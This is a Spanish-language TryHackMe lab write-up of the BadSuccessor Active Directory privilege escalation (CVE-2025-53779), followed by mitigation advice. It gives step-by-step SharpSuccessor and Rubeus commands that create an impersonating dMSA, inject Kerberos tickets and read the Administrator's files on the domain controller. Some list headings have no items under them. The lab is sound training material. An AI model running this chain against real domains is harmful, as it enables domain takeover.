
Una sala de TryHackme que cubre la explotación de CVE-2025-53779 usando windows.
En esta sala, exploramos la técnica de escalada de privilegios BadSuccessor, una vulnerabilidad que abusa de las Cuentas de Servicio Administradas Delegadas (dMSA) en Active Directory. El ataque permite a un usuario con suficiente control sobre un objeto dMSA suplantar a otra cuenta y potencialmente alcanzar privilegios de Administrador de Dominio.
Sala: https://tryhackme.com/room/adbadsuccessor
Dificultad: Media
Fecha: 05/06/2026
Versión: 1.0
Objetivo: Demostrar cómo las Cuentas de Servicio Administradas Delegadas pueden ser abusadas para escalar privilegios y comprometer un entorno de Active Directory.
Rol: Terry Byte (tbyte)
Meta: Evaluar la seguridad de un entorno de Active Directory recién implementado y determinar si es vulnerable al ataque BadSuccessor.
El ataque consta de dos fases principales:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Muévase al directorio de Prueba de Concepto:
cd C:\PoC
Verifique el contenido: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Use SharpSuccessor para crear una Cuenta de Servicio Administrada Delegada que suplante la cuenta de Administrador:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
¿Qué Sucede?
Use Rubeus para obtener un Ticket de Concesión de Tickets (TGT) delegado:
.\Rubeus.exe tgtdeleg /nowrap
El comando devuelve un ticket Kerberos codificado en Base64.
Copie el ticket generado.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Resultado:
Se inyecta un nuevo ticket Kerberos en la memoria para la cuenta dMSA.
Aproveche el ticket dMSA para obtener acceso a servicios que se ejecutan bajo el contexto de Administrador:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Resultado:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Lea la bandera almacenada en el escritorio del Administrador:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Bandera obtenida exitosamente.
BadSuccessor demuestra cómo las Cuentas de Servicio Administradas Delegadas pueden introducir rutas de escalada de privilegios en entornos Active Directory. Active Directory sirve como la base de identidad para muchas organizaciones; las vulnerabilidades que afectan a Kerberos y la delegación de cuentas pueden tener consecuencias graves.
Un atacante con permisos suficientes sobre un objeto dMSA puede:
Para mitigar BadSuccessor (CVE-2025-53779), las organizaciones deben aplicar rápidamente las actualizaciones de seguridad de Microsoft, restringir y revisar los permisos de dMSA, monitorear la actividad sospechosa de Kerberos, auditar las relaciones de delegación y aplicar el principio de mínimo privilegio. Las revisiones periódicas de la configuración de delegación de Active Directory pueden ayudar a identificar y reducir posibles rutas de escalada de privilegios.
Esta sala proporcionó una valiosa experiencia práctica con: